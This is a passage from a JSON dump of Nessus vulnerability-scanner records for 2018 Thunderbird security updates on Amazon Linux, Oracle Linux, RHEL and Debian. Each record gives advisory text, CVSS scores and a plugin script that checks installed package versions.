via\nchosen-ciphertext attack\n\nCVE-2018-5159 : Integer overflow and out-of-bounds write in Skia\n\nCVE-2018-5178 : Buffer overflow during UTF-8 to Unicode string\nconversion through legacy extension\n\nCVE-2018-5168 : Lightweight themes can be installed without user\ninteraction\n\nCVE-2018-5150 : Memory safety bugs fixed in Firefox 60 and Firefox ESR\n52.8\n\nCVE-2018-5154 : Use-after-free with SVG animations and clip paths\n\nCVE-2018-5185 : Leaking plaintext through HTML forms", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-06-12T00:00:00", "title": "Amazon Linux 2 : thunderbird (ALAS-2018-1032)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "modified": "2018-06-12T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:thunderbird", "cpe:/o:amazon:linux:2", "p-cpe:/a:amazon:linux:thunderbird-debuginfo"], "id": "AL2_ALAS-2018-1032.NASL", "href": "https://www.tenable.com/plugins/nessus/110449", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2018-1032.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110449);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5159\", \"CVE-2018-5161\", \"CVE-2018-5162\", \"CVE-2018-5168\", \"CVE-2018-5170\", \"CVE-2018-5178\", \"CVE-2018-5183\", \"CVE-2018-5184\", \"CVE-2018-5185\");\n script_xref(name:\"ALAS\", value:\"2018-1032\");\n\n script_name(english:\"Amazon Linux 2 : thunderbird (ALAS-2018-1032)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux 2 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The following CVEs are fixed in the updated thunderbird package :\n\nCVE-2018-5161 : Hang via malformed headers\n\nCVE-2018-5162 : Encrypted mail leaks plaintext through src attribute\n\nCVE-2018-5183 : Backport critical security fixes in Skia\n\nCVE-2018-5155 : Use-after-free with SVG animations and text paths\n\nCVE-2018-5170 : Filename spoofing for external attachments\n\nCVE-2018-5184 : Full plaintext recovery in S/MIME via\nchosen-ciphertext attack\n\nCVE-2018-5159 : Integer overflow and out-of-bounds write in Skia\n\nCVE-2018-5178 : Buffer overflow during UTF-8 to Unicode string\nconversion through legacy extension\n\nCVE-2018-5168 : Lightweight themes can be installed without user\ninteraction\n\nCVE-2018-5150 : Memory safety bugs fixed in Firefox 60 and Firefox ESR\n52.8\n\nCVE-2018-5154 : Use-after-free with SVG animations and clip paths\n\nCVE-2018-5185 : Leaking plaintext through HTML forms\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/AL2/ALAS-2018-1032.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Run 'yum update thunderbird' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:thunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"thunderbird-52.8.0-1.amzn2\", allowmaj:TRUE)) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"thunderbird-debuginfo-52.8.0-1.amzn2\", allowmaj:TRUE)) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird / thunderbird-debuginfo\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-31T19:59:42", "description": "From Red Hat Security Advisory 2018:1725 :\n\nAn update for thunderbird is now available for Red Hat Enterprise\nLinux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es) :\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8\n(CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths\n(CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths\n(CVE-2018-5155)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia\n(CVE-2018-5159)\n\n* Mozilla: Full plaintext recovery in S/MIME via chosen-ciphertext\nattack (CVE-2018-5184)\n\n* Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n* Mozilla: Encrypted mail leaks plaintext through src attribute\n(CVE-2018-5162)\n\n* Mozilla: Lightweight themes can be installed without user\ninteraction (CVE-2018-5168)\n\n* Mozilla: Filename spoofing for external attachments (CVE-2018-5170)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion\nthrough legacy extension (CVE-2018-5178)\n\n* Mozilla: Leaking plaintext through HTML forms (CVE-2018-5185)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting\nCVE-2018-5150, CVE-2018-5154, CVE-2018-5155, CVE-2018-5159,\nCVE-2018-5168, CVE-2018-5178, and CVE-2018-5183. Upstream acknowledges\nChristoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald\nCrane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla\nDevelopers, Nils, Ivan Fratric, Wladimir Palant, and Root Object as\nthe original reporters.", "edition": 20, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-25T00:00:00", "title": "Oracle Linux 7 : thunderbird (ELSA-2018-1725)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "modified": "2018-05-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:thunderbird", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2018-1725.NASL", "href": "https://www.tenable.com/plugins/nessus/110108", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2018:1725 and \n# Oracle Linux Security Advisory ELSA-2018-1725 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110108);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5159\", \"CVE-2018-5161\", \"CVE-2018-5162\", \"CVE-2018-5168\", \"CVE-2018-5170\", \"CVE-2018-5178\", \"CVE-2018-5183\", \"CVE-2018-5184\", \"CVE-2018-5185\");\n script_xref(name:\"RHSA\", value:\"2018:1725\");\n\n script_name(english:\"Oracle Linux 7 : thunderbird (ELSA-2018-1725)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"From Red Hat Security Advisory 2018:1725 :\n\nAn update for thunderbird is now available for Red Hat Enterprise\nLinux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es) :\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8\n(CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths\n(CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths\n(CVE-2018-5155)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia\n(CVE-2018-5159)\n\n* Mozilla: Full plaintext recovery in S/MIME via chosen-ciphertext\nattack (CVE-2018-5184)\n\n* Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n* Mozilla: Encrypted mail leaks plaintext through src attribute\n(CVE-2018-5162)\n\n* Mozilla: Lightweight themes can be installed without user\ninteraction (CVE-2018-5168)\n\n* Mozilla: Filename spoofing for external attachments (CVE-2018-5170)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion\nthrough legacy extension (CVE-2018-5178)\n\n* Mozilla: Leaking plaintext through HTML forms (CVE-2018-5185)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting\nCVE-2018-5150, CVE-2018-5154, CVE-2018-5155, CVE-2018-5159,\nCVE-2018-5168, CVE-2018-5178, and CVE-2018-5183. Upstream acknowledges\nChristoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald\nCrane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla\nDevelopers, Nils, Ivan Fratric, Wladimir Palant, and Root Object as\nthe original reporters.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-May/007764.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"thunderbird-52.8.0-1.0.1.el7_5\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-31T20:16:07", "description": "An update for thunderbird is now available for Red Hat Enterprise\nLinux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es) :\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8\n(CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths\n(CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths\n(CVE-2018-5155)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia\n(CVE-2018-5159)\n\n* Mozilla: Full plaintext recovery in S/MIME via chosen-ciphertext\nattack (CVE-2018-5184)\n\n* Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n* Mozilla: Encrypted mail leaks plaintext through src attribute\n(CVE-2018-5162)\n\n* Mozilla: Lightweight themes can be installed without user\ninteraction (CVE-2018-5168)\n\n* Mozilla: Filename spoofing for external attachments (CVE-2018-5170)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion\nthrough legacy extension (CVE-2018-5178)\n\n* Mozilla: Leaking plaintext through HTML forms (CVE-2018-5185)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting\nCVE-2018-5150, CVE-2018-5154, CVE-2018-5155, CVE-2018-5159,\nCVE-2018-5168, CVE-2018-5178, and CVE-2018-5183. Upstream acknowledges\nChristoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald\nCrane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla\nDevelopers, Nils, Ivan Fratric, Wladimir Palant, and Root Object as\nthe original reporters.", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-25T00:00:00", "title": "RHEL 6 : thunderbird (RHSA-2018:1726)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "modified": "2018-05-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:thunderbird", "p-cpe:/a:redhat:enterprise_linux:thunderbird-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2018-1726.NASL", "href": "https://www.tenable.com/plugins/nessus/110120", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:1726. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110120);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5159\", \"CVE-2018-5161\", \"CVE-2018-5162\", \"CVE-2018-5168\", \"CVE-2018-5170\", \"CVE-2018-5178\", \"CVE-2018-5183\", \"CVE-2018-5184\", \"CVE-2018-5185\");\n script_xref(name:\"RHSA\", value:\"2018:1726\");\n\n script_name(english:\"RHEL 6 : thunderbird (RHSA-2018:1726)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for thunderbird is now available for Red Hat Enterprise\nLinux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es) :\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8\n(CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths\n(CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths\n(CVE-2018-5155)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia\n(CVE-2018-5159)\n\n* Mozilla: Full plaintext recovery in S/MIME via chosen-ciphertext\nattack (CVE-2018-5184)\n\n* Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n* Mozilla: Encrypted mail leaks plaintext through src attribute\n(CVE-2018-5162)\n\n* Mozilla: Lightweight themes can be installed without user\ninteraction (CVE-2018-5168)\n\n* Mozilla: Filename spoofing for external attachments (CVE-2018-5170)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion\nthrough legacy extension (CVE-2018-5178)\n\n* Mozilla: Leaking plaintext through HTML forms (CVE-2018-5185)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting\nCVE-2018-5150, CVE-2018-5154, CVE-2018-5155, CVE-2018-5159,\nCVE-2018-5168, CVE-2018-5178, and CVE-2018-5183. Upstream acknowledges\nChristoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald\nCrane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla\nDevelopers, Nils, Ivan Fratric, Wladimir Palant, and Root Object as\nthe original reporters.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:1726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5150\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5154\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5155\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5159\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5161\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5162\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5168\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5178\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5184\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5185\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected thunderbird and / or thunderbird-debuginfo\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:thunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:1726\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"thunderbird-52.8.0-2.el6_9\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"thunderbird-52.8.0-2.el6_9\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"thunderbird-52.8.0-2.el6_9\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"thunderbird-debuginfo-52.8.0-2.el6_9\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"thunderbird-debuginfo-52.8.0-2.el6_9\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"thunderbird-debuginfo-52.8.0-2.el6_9\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird / thunderbird-debuginfo\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:47:21", "description": "Multiple security issues have been found in Thunderbird, which may\nlead to the execution of arbitrary code, denial of service or attacks\non encrypted emails.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-25T00:00:00", "title": "Debian DSA-4209-1 : thunderbird - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:thunderbird", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4209.NASL", "href": "https://www.tenable.com/plugins/nessus/110101", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and 